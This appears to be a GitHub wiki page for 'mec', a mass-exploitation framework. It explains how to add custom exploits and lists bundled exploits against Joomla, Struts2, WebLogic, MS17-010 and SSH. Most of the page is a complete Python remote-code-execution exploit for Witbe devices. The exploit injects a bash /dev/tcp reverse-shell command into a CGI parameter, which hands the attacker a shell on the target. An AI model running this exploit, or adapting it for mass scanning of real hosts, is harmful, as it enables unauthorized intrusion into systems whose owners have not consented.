Skip to content

Custom Exploits

Jump to bottom
jm33-ng edited this page Feb 28, 2020 · 6 revisions

FAQ

Where to put my custom exploit?

ls ./exploits/your-custom-exploit/
your-exploit-executable your-other-files

Is there any example?

#!/usr/bin/python3
# pylint: disable=invalid-name, line-too-long, import-error, no-member, missing-docstring, broad-except
# Exploit Title: Witbe RCE (Remote Code Execution)
# Exploit Author: BeLmar
# Date: 05/10/2016
# DEMO : https://youtu.be/ooUFXfUfIs0
# Contact : [email protected]
# Vendor Homepage: http://www.witbe.net
# Tested on: Windows7/10 & BackBox
# Category: Remote Exploits

import argparse
import sys
import traceback
import urllib.error
import urllib.parse
import urllib.request


def main():
    parser = argparse.ArgumentParser(prog='witbe.py', description='pwn witbe')
    parser.add_argument('-t', dest='RHOST', required=True, help='Remote Target Server')
    parser.add_argument('-l', dest='LHOST', required=True, help='specifiy local ip for reverse shell')
    parser.add_argument('-p', dest='LPORT', required=True, help='specifiy local port for reverse shell')
    #parser.add_argument('--cmd', dest='cmd', action='store_true', help='drop into blind RCE')
    args = parser.parse_args()
    rhost = args.RHOST
    lhost = args.LHOST
    lport = args.LPORT


    url = 'http://'+rhost+'/cgi-bin/applyConfig.pl'
    # user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36'
    values = {
        'auth_login': '', #Leave it as it is
        'auth_pwd': '',   #Leave it as it is
        'file': 'set|bash -i >& /dev/tcp/'+lhost+'/'+lport+' 0>&1'
    }

    try:
        data = urllib.parse.urlencode(values).encode("utf-8")
        req = urllib.request.Request(url, data)
        response = urllib.request.urlopen(req)
        print(response.read())
    except BaseException:
        print(f"Error: {traceback.format_exc()}")

try:
    main()
except KeyboardInterrupt:
    sys.exit(1)

How does mec pass "target_ip" argument to my script?

In this demo, you can see that mec simply passes target_ip as the last argument

parser.add_argument('-t', dest='RHOST', required=True, help='Remote Target Server')

Note that mec passes -t <target> to your exploit, so when your exploit gets executed by mec, its command line argument looks like:

./exploit <custom args> -t <target ip>

Directory hierarchy

mec directory tree

mec
├── conf
│   ├── censys.conf
│   └── zoomeye.conf
├── data
│   ├── ip_list.txt
│   ├── proxy.conf
│   ├── ss.json
│   └── zoomeye-login.action.txt
├── exploits
│   ├── exserial
│   ├── joomla
│   ├── MS17-010
│   ├── ssh-bruteforce
│   ├── structs2
│   ├── test
│   ├── weblogic
│   ├── witbe
│   └── wordpress
├── install.py
├── lib
│   ├── cli
│   ├── __init__.py
│   ├── __pycache__
│   └── tools
├── LICENSE
├── mec
├── mec.py
├── output
│   └── result.txt
├── README.md
├── requirements.txt
├── screenshot
│   ├── main.jpg
│   └── zoomeye.jpg
└── tools
    ├── geckodriver
    └── ss-proxy

Your "test" exploit

Your custom exploits live under ./exploits, just like any built-in ones.

Take a look at test exploit:

├── structs2
│   ├── 045.py
│   ├── colors.py
│   ├── console.py
│   ├── s2_045_cmd.py
│   ├── Struts2_045-Poc
│   ├── struts2-s2045.py
│   └── tmp.txt
├── test
│   └── test
├── weblogic

./exploit/test/test is the exploit, you can view all available exploits by issuing exploits command in mec:

mec > exploits
[+] Available exploits:
witbe/witbe.py
test/test
joomla/rce-ssl.py
joomla/joomraa.py
joomla/rce.py
joomla/joomlaCVE-2015-8562.py
joomla/rcew.py
joomla/hackUtils.py
joomla/joomla_sqli_mass_exploit.py
exserial/jenkin.py
exserial/websphere.py
exserial/weblogic.py
exserial/jboss.py
wordpress/rce.sh
ssh-bruteforce/ssh_bruteforce.py
weblogic/weblogic.py
weblogic/batch_weblogic.sh
weblogic/scan.py
structs2/045.py
structs2/s2_045_cmd.py
structs2/struts2-s2045.py

How mec works

mec enters target exploit's directory before launching a mass-exploit job, thus relative paths are allowed, custom exploit's root directory won't change when being used by mec

Your exploit can be either a binary file or a script, as long as you chmod +x them first. Before launching a mass-exploit job, you will see a warning reminding you how your exploit is going to be executed:

[!] DEBUG: ['./ssh_bruteforce.py', '/tmp/1', 'id', '-t']
Working in /home/u/.mec/exploits/ssh-bruteforce
[?] Proceed? [y/n]
  • If you have any issues, please report them to https://github.com/jm33-m0/mec/issues
  • Open a pull request when you have fixed any bugs or added any features
  • I would appreciate you adding your own adapted exploits to this repo
Clone this wiki locally